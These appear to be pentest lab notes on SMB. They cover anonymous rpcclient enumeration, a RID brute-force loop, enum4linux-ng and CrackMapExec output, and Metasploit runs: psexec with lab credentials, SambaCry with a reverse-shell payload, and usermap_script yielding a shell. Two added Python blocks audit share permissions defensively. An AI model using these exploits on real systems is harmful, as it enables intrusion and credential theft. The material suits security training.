Comment:        DEVSM
Total Users:    2
Total Groups:   0
Total Aliases:  0
Sequence No:    1632361158
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1


rpcclient $> netshareenumall

netname: print$
        remark: Printer Drivers
        path:   C:\var\lib\samba\printers
        password:
netname: home
        remark: INFREIGHT Samba
        path:   C:\home\
        password:
netname: dev
        remark: DEVenv
        path:   C:\home\sambauser\dev\
        password:
netname: notes
        remark: CheckIT
        path:   C:\mnt\notes\
        password:
netname: IPC$
        remark: IPC Service (DEVSM)
        path:   C:\tmp
        password:
		
		
rpcclient $> netsharegetinfo notes

netname: notes
        remark: CheckIT
        path:   C:\mnt\notes\
        password:
        type:   0x0
        perms:  0
        max_uses:       -1
        num_uses:       1
revision: 1
type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE 
DACL
        ACL     Num ACEs:       1       revision:       2
        ---
        ACE
                type: ACCESS ALLOWED (0) flags: 0x00 
                Specific bits: 0x1ff
                Permissions: 0x101f01ff: Generic all access SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS 
                SID: S-1-1-0
```
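The `netsharegetinfo` output above ends with the share's security descriptor: a single ACE that grants S-1-1-0 (Everyone) generic-all access, which is why the anonymous user could list and fetch files. The following is an added example, not code from the page or from Samba: a Python parser for that rpcclient output that flags ACEs granting write-class rights to Everyone or Anonymous Logon. It is run against the page's `notes` output and against a constructed read-only ACE for BUILTIN\Users (S-1-5-32-545, mask 0x1200a9 = FILE_GENERIC_READ | FILE_GENERIC_EXECUTE) for comparison; the access-mask constants are the standard Windows ACCESS_MASK bits.

```python
import re
from typing import Dict, List, Optional, Tuple

# rpcclient 'netsharegetinfo notes' output, copied from the transcript above.
NOTES_SHARE_INFO = """\
netname: notes
        remark: CheckIT
        path:   C:\\mnt\\notes\\
        password:
        type:   0x0
        perms:  0
        max_uses:       -1
        num_uses:       1
revision: 1
type: 0x8004: SEC_DESC_DACL_PRESENT SEC_DESC_SELF_RELATIVE
DACL
        ACL     Num ACEs:       1       revision:       2
        ---
        ACE
                type: ACCESS ALLOWED (0) flags: 0x00
                Specific bits: 0x1ff
                Permissions: 0x101f01ff: Generic all access SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS DELETE_ACCESS
                SID: S-1-1-0
"""

# Constructed: the same share with a read/execute-only ACE for BUILTIN\Users.
READONLY_SHARE_INFO = """\
netname: notes
        remark: CheckIT
DACL
        ACL     Num ACEs:       1       revision:       2
        ---
        ACE
                type: ACCESS ALLOWED (0) flags: 0x00
                Specific bits: 0xa9
                Permissions: 0x001200a9: SYNCHRONIZE_ACCESS READ_CONTROL_ACCESS
                SID: S-1-5-32-545
"""

# ACCESS_MASK bits that let the holder change the share or its contents.
GENERIC_ALL, GENERIC_WRITE = 0x10000000, 0x40000000
DELETE, WRITE_DAC, WRITE_OWNER = 0x00010000, 0x00040000, 0x00080000
FILE_WRITE_DATA, FILE_APPEND_DATA = 0x00000002, 0x00000004
WRITE_MASK = (GENERIC_ALL | GENERIC_WRITE | DELETE | WRITE_DAC | WRITE_OWNER
              | FILE_WRITE_DATA | FILE_APPEND_DATA)

# Well-known SIDs that a guest or null session can end up holding.
ANONYMOUS_SIDS = {"S-1-1-0": "Everyone", "S-1-5-7": "Anonymous Logon"}


def parse_share_acl(output: str) -> Tuple[Optional[str], List[Dict[str, object]]]:
    """Return (share name, ACE list) from rpcclient netsharegetinfo output.

    Each ACE dict carries 'type' (ALLOWED/DENIED), 'mask' (int) and 'sid'."""
    share: Optional[str] = None
    aces: List[Dict[str, object]] = []
    current: Optional[Dict[str, object]] = None
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("netname:"):
            share = line.split(":", 1)[1].strip()
        elif line == "ACE":                      # each ACE block opens with a bare "ACE" line
            current = {}
            aces.append(current)
        elif current is not None:
            if (m := re.match(r"type:\s+ACCESS (ALLOWED|DENIED)", line)):
                current["type"] = m.group(1)
            elif (m := re.match(r"Permissions:\s+(0x[0-9a-fA-F]+)", line)):
                current["mask"] = int(m.group(1), 16)
            elif (m := re.match(r"SID:\s+(S-[\d-]+)", line)):
                current["sid"] = m.group(1)
    return share, aces


def audit_share_acl(output: str) -> List[str]:
    """Findings for ALLOWED ACEs that give Everyone/Anonymous any write-class right."""
    share, aces = parse_share_acl(output)
    findings: List[str] = []
    for ace in aces:
        sid = str(ace.get("sid", ""))
        mask = int(ace.get("mask", 0))       # type: ignore[arg-type]
        if ace.get("type") == "ALLOWED" and sid in ANONYMOUS_SIDS and mask & WRITE_MASK:
            findings.append(f"{share}: {ANONYMOUS_SIDS[sid]} ({sid}) granted "
                            f"write-class rights, mask 0x{mask:08x}")
    return findings


if __name__ == "__main__":
    for label, info in (("page sample", NOTES_SHARE_INFO), ("constructed", READONLY_SHARE_INFO)):
        print(label, audit_share_acl(info) or "no world-writable ACEs")
```

Reading the mask rather than the textual rights list keeps the check stable across rpcclient versions, and the same bit test applies to the `perms` value that `smbcacls` prints for individual files on the share.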

These examples show us what information can be leaked to anonymous users. Once an `anonymous` user has access to a network service, it only takes one mistake to give them too many permissions or too much visibility to put the entire network at significant risk.

Most importantly, anonymous access to such services can also lead to the discovery of other users, who can be attacked with brute-forcing in the most aggressive case. Humans are more error-prone than properly configured computer processes, and the lack of security awareness and laziness often leads to weak passwords that can be easily cracked. Let us see how we can enumerate users using the `rpcclient`.

**Rpcclient - User Enumeration**

```shell-session
rpcclient $> enumdomusers

user:[mrb3n] rid:[0x3e8]
user:[cry0l1t3] rid:[0x3e9]


rpcclient $> queryuser 0x3e9

        User Name   :   cry0l1t3
        Full Name   :   cry0l1t3
        Home Drive  :   \\devsmb\cry0l1t3
        Dir Drive   :
        Profile Path:   \\devsmb\cry0l1t3\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Do, 01 Jan 1970 01:00:00 CET
        Logoff Time              :      Mi, 06 Feb 2036 16:06:39 CET
        Kickoff Time             :      Mi, 06 Feb 2036 16:06:39 CET
        Password last set Time   :      Mi, 22 Sep 2021 17:50:56 CEST
        Password can change Time :      Mi, 22 Sep 2021 17:50:56 CEST
        Password must change Time:      Do, 14 Sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x3e9
        group_rid:      0x201
        acb_info :      0x00000014
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...


rpcclient $> queryuser 0x3e8

        User Name   :   mrb3n
        Full Name   :
        Home Drive  :   \\devsmb\mrb3n
        Dir Drive   :
        Profile Path:   \\devsmb\mrb3n\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Do, 01 Jan 1970 01:00:00 CET
        Logoff Time              :      Mi, 06 Feb 2036 16:06:39 CET
        Kickoff Time             :      Mi, 06 Feb 2036 16:06:39 CET
        Password last set Time   :      Mi, 22 Sep 2021 17:47:59 CEST
        Password can change Time :      Mi, 22 Sep 2021 17:47:59 CEST
        Password must change Time:      Do, 14 Sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x3e8
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
```

From these results we can identify the group's RID (`0x201` here) and use it to retrieve information about the whole group.

**Rpcclient - Group Information**

```shell-session
rpcclient $> querygroup 0x201

        Group Name:     None
        Description:    Ordinary Users
        Group Attribute:7
        Num Members:2
```

It can also happen that not all commands are available to us and that certain restrictions apply depending on the user. The query `queryuser <RID>`, however, is usually permitted. We can therefore use rpcclient to brute-force the RIDs: we may not know which RID has been assigned to whom, but as soon as we query an assigned RID we get information about it. There are several ways and tools for this. Staying with rpcclient, we can write a `for` loop in `Bash` that sends the command to the service and filters the results.

**Brute Forcing User RIDs**

```shell-session
ammartiger@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

        User Name   :   sambauser
        user_rid :      0x1f5
        group_rid:      0x201
		
        User Name   :   mrb3n
        user_rid :      0x3e8
        group_rid:      0x201
		
        User Name   :   cry0l1t3
        user_rid :      0x3e9
        group_rid:      0x201
```

An alternative to this would be a Python script from [Impacket](https://github.com/SecureAuthCorp/impacket) called [samrdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py).

**Impacket - Samrdump.py**

```shell-session
ammartiger@htb[/htb]$ samrdump.py 10.129.14.128

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from 10.129.14.128
Found domain(s):
 . DEVSMB
 . Builtin
[*] Looking up users in domain DEVSMB
Found user: mrb3n, uid = 1000
Found user: cry0l1t3, uid = 1001
mrb3n (1000)/FullName: 
mrb3n (1000)/UserComment: 
mrb3n (1000)/PrimaryGroupId: 513
mrb3n (1000)/BadPasswordCount: 0
mrb3n (1000)/LogonCount: 0
mrb3n (1000)/PasswordLastSet: 2021-09-22 17:47:59
mrb3n (1000)/PasswordDoesNotExpire: False
mrb3n (1000)/AccountIsDisabled: False
mrb3n (1000)/ScriptPath: 
cry0l1t3 (1001)/FullName: cry0l1t3
cry0l1t3 (1001)/UserComment: 
cry0l1t3 (1001)/PrimaryGroupId: 513
cry0l1t3 (1001)/BadPasswordCount: 0
cry0l1t3 (1001)/LogonCount: 0
cry0l1t3 (1001)/PasswordLastSet: 2021-09-22 17:50:56
cry0l1t3 (1001)/PasswordDoesNotExpire: False
cry0l1t3 (1001)/AccountIsDisabled: False
cry0l1t3 (1001)/ScriptPath: 
[*] Received 2 entries.
```

The information we have already obtained with `rpcclient` can also be obtained using other tools. For example, the [SMBMap](https://github.com/ShawnDEvans/smbmap) and [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) tools are also widely used and helpful for the enumeration of SMB services.

### Metasploit Database

If there are multiple targets, the Metasploit database is required; start PostgreSQL and initialize the database:

```
systemctl start postgresql
msfdb init
```

Then start `msfconsole` and check the database status:

```
db_status
```

### SMB Exploitation with Metasploit with known credentials

### Reference

{% embed url="https://tryhackme.com/room/meterpreter" %}

```
use exploit/windows/smb/psexec
set RHOSTS 10.10.218.141
set SMBUser ballen
set SMBPass Password1
run
```


### Post exploitation Modules

```
post/windows/gather/enum_domain
post/windows/gather/enum_shares
```

**CrackMapExec**

```shell-session
ammartiger@htb[/htb]$ crackmapexec smb 10.129.14.128 --shares -u '' -p ''

SMB         10.129.14.128   445    DEVSMB           [*] Windows 6.1 Build 0 (name:DEVSMB) (domain:) (signing:False) (SMBv1:False)
SMB         10.129.14.128   445    DEVSMB           [+] \: 
SMB         10.129.14.128   445    DEVSMB           [+] Enumerated shares
SMB         10.129.14.128   445    DEVSMB           Share           Permissions     Remark
SMB         10.129.14.128   445    DEVSMB           -----           -----------     ------
SMB         10.129.14.128   445    DEVSMB           print$                          Printer Drivers
SMB         10.129.14.128   445    DEVSMB           home                            INFREIGHT Samba
SMB         10.129.14.128   445    DEVSMB           dev                             DEVenv
SMB         10.129.14.128   445    DEVSMB           notes           READ,WRITE      CheckIT
SMB         10.129.14.128   445    DEVSMB           IPC$                            IPC Service (DEVSM)
```

Another tool worth mentioning is the so-called [enum4linux-ng](https://github.com/cddmp/enum4linux-ng), which is based on an older tool, enum4linux. This tool automates many of the queries, but not all, and can return a large amount of information.

**Enum4Linux-ng - Installation**

```shell-session
ammartiger@htb[/htb]$ git clone https://github.com/cddmp/enum4linux-ng.git
ammartiger@htb[/htb]$ cd enum4linux-ng
ammartiger@htb[/htb]$ pip3 install -r requirements.txt
```

**Enum4Linux-ng - Enumeration**

```shell-session
ammartiger@htb[/htb]$ ./enum4linux-ng.py 10.129.14.128 -A

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.14.128
[*] Username ......... ''
[*] Random Username .. 'juzgtcsu'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =====================================
|    Service Scan on 10.129.14.128    |
 =====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    NetBIOS Names and Workgroup for 10.129.14.128    |
 =====================================================
[+] Got domain/workgroup name: DEVOPS
[+] Full NetBIOS names information:
- DEVSMB          <00> -         H <ACTIVE>  Workstation Service
- DEVSMB          <03> -         H <ACTIVE>  Messenger Service
- DEVSMB          <20> -         H <ACTIVE>  File Server Service
- ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>  Master Browser
- DEVOPS          <00> - <GROUP> H <ACTIVE>  Domain/Workgroup Name
- DEVOPS          <1d> -         H <ACTIVE>  Master Browser
- DEVOPS          <1e> - <GROUP> H <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 ==========================================
|    SMB Dialect Check on 10.129.14.128    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB1 only: false
Preferred dialect: SMB 3.0
SMB signing required: false

 ==========================================
|    RPC Session Check on 10.129.14.128    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user session
[+] Server allows session using username 'juzgtcsu', password ''
[H] Rerunning enumeration with user 'juzgtcsu' might give more results

 ====================================================
|    Domain Information via RPC for 10.129.14.128    |
 ====================================================
[+] Domain: DEVOPS
[+] SID: NULL SID
[+] Host is part of a workgroup (not a domain)

 ============================================================
|    Domain Information via SMB session for 10.129.14.128    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DEVSMB
NetBIOS domain name: ''
DNS domain: ''
FQDN: htb

 ================================================
|    OS Information via RPC for 10.129.14.128    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT DEVSM

 ======================================
|    Users via RPC on 10.129.14.128    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 2 users via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 2 users via 'enumdomusers'
[+] After merging user results we have 2 users total:
'1000':
  username: mrb3n
  name: ''
  acb: '0x00000010'
  description: ''
'1001':
  username: cry0l1t3
  name: cry0l1t3
  acb: '0x00000014'
  description: ''

 =======================================
|    Groups via RPC on 10.129.14.128    |
 =======================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 =======================================
|    Shares via RPC on 10.129.14.128    |
 =======================================
[*] Enumerating shares
[+] Found 5 share(s):
IPC$:
  comment: IPC Service (DEVSM)
  type: IPC
dev:
  comment: DEVenv
  type: Disk
home:
  comment: INFREIGHT Samba
  type: Disk
notes:
  comment: CheckIT
  type: Disk
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share dev
[-] Share doesn't exist
[*] Testing share home
[+] Mapping: OK, Listing: OK
[*] Testing share notes
[+] Mapping: OK, Listing: OK
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A

 ==========================================
|    Policies via RPC for 10.129.14.128    |
 ==========================================
[*] Trying port 445/tcp
[+] Found policy:
domain_password_information:
  pw_history_length: None
  min_pw_length: 5
  min_pw_age: none
  max_pw_age: 49710 days 6 hours 21 minutes
  pw_properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
domain_lockout_information:
  lockout_observation_window: 30 minutes
  lockout_duration: 30 minutes
  lockout_threshold: None
domain_logoff_information:
  force_logoff_time: 49710 days 6 hours 21 minutes

 ==========================================
|    Printers via RPC for 10.129.14.128    |
 ==========================================
[+] No printers returned (this is not an error)

Completed after 0.61 seconds
```

### <mark style="color:orange;">About IPC$ share</mark>

<mark style="color:orange;">"The IPC$ share is also known as a null session connection. By using this session, Windows lets anonymous users perform certain activities, such as enumerating the names of domain accounts and network shares."</mark>

### exploit/linux/samba/is\_known\_pipename

```
┌──(root㉿INE)-[~]
└─# nmap -sS -sV --script=vuln demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-14 19:51 IST
Nmap scan report for demo.ine.local (192.189.188.3)
Host is up (0.000036s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 02:42:C0:BD:BC:03 (Unknown)
Service Info: Host: DEMO

```

We will exploit a common vulnerability in an older version of Samba (e.g., SambaCry, CVE-2017-7494).

```
msfconsole
use exploit/linux/samba/is_known_pipename
set RHOSTS <target-ip>
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your-ip>
exploit
```

📌 **Affected Samba versions:**

* **Samba ≥ 3.5.0** up to **4.4.14**
* **Samba ≥ 4.5.0** up to **4.5.10**
* **Samba ≥ 4.6.0** up to **4.6.4**

2️⃣ SMB service must allow writable shares

* Even if the version is vulnerable:
  * At least one SMB share must be writable
  * Anonymous or authenticated access is required
  * If all shares are read-only, the vulnerability cannot be triggered.
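As an added example (not the notes' own code), the following Python checks both preconditions from the assessment side: it parses a Samba version banner against the affected ranges listed above, treating each "up to" version as the first fixed release (an assumption; 4.4.14, 4.5.10 and 4.6.4 are the patched releases in the Samba advisory), and it parses CrackMapExec `--shares` output for shares reported with `WRITE`. It also refuses to decide on a vague banner such as nmap's `3.X - 4.X` above, which is not enough to fingerprint an affected release.

```python
import re

# Affected ranges from the list above; each "up to" version is assumed to be
# the first fixed release, so the ranges are [first_affected, fixed).
AFFECTED_RANGES = [((3, 5, 0), (4, 4, 14)), ((4, 5, 0), (4, 5, 10)),
                   ((4, 6, 0), (4, 6, 4))]
VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")
# crackmapexec share rows look like: SMB <ip> <port> <host> <share> [perms] <remark>
SHARE_ROW_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(\S+)\s*(.*)$")
PERM_WORDS = {"READ", "WRITE", "READ,WRITE"}

def parse_samba_version(banner):
    """(major, minor, patch) from a banner, or None when it is too vague."""
    m = VERSION_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None

def version_affected(version):
    return any(lo <= version < hi for lo, hi in AFFECTED_RANGES)

def writable_shares(cme_output):
    """Shares that crackmapexec --shares reported with WRITE permission."""
    names = []
    for line in cme_output.splitlines():
        m = SHARE_ROW_RE.match(line.strip())
        if not m or m.group(1) in {"Share", "-----"} or m.group(1).startswith("["):
            continue                      # status lines and table header
        rest = m.group(2).split()
        if rest and rest[0] in PERM_WORDS and "WRITE" in rest[0]:
            names.append(m.group(1))
    return names

def assess(banner, cme_output):
    """Verdict combining the two preconditions listed above."""
    v = parse_samba_version(banner)
    if v is None:
        return "unknown: banner too vague, fingerprint the exact Samba release"
    if not version_affected(v):
        return "not affected: %d.%d.%d is outside the affected ranges" % v
    shares = writable_shares(cme_output)
    if not shares:
        return "affected version, but no writable share was enumerated"
    return "exposed: affected version and writable share(s): " + ", ".join(shares)

# Constructed sample input, assembled from the nmap and crackmapexec output above.
NMAP_BANNER = "Samba smbd 3.X - 4.X (workgroup: WORKGROUP)"
CME_SHARES = """\
SMB         10.129.14.128   445    DEVSMB           Share           Permissions     Remark
SMB         10.129.14.128   445    DEVSMB           print$                          Printer Drivers
SMB         10.129.14.128   445    DEVSMB           notes           READ,WRITE      CheckIT
"""

if __name__ == "__main__":
    print(assess(NMAP_BANNER, CME_SHARES))
    print(assess("Samba 4.5.3-Debian", CME_SHARES))
```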



### Exploiting samba 3.0.20

Now that we have identified the specific version of Samba running on the target, we can utilize a tool like Searchsploit to find exploits that affect this version of Samba. This can be done by running the following command:

```
searchsploit samba 3.0.20
```

As shown in the following screenshot, Searchsploit reveals a few exploits, one of which is a Metasploit exploit module that can be used to exploit the version of Samba running on the target system.

<figure><img src="https://assets.ine.com/lab/learningpath/2dab9aaad38bc52e6f385dbb178d5f38d0562de9769b0c0f97ee07eb784f92f1.jpg" alt=""><figcaption></figcaption></figure>

Let's run this exploit module:

```
use exploit/multi/samba/usermap_script
set RHOSTS demo.ine.local
exploit
```

<figure><img src="https://assets.ine.com/lab/learningpath/ab7f59f64c0f834d55e40ed9218974ecbe82efd1dde1e47bb15b0e256ca0574a.jpg" alt=""><figcaption></figcaption></figure>

As shown in the above screenshot, the exploit module runs successfully and provides us with a command shell.

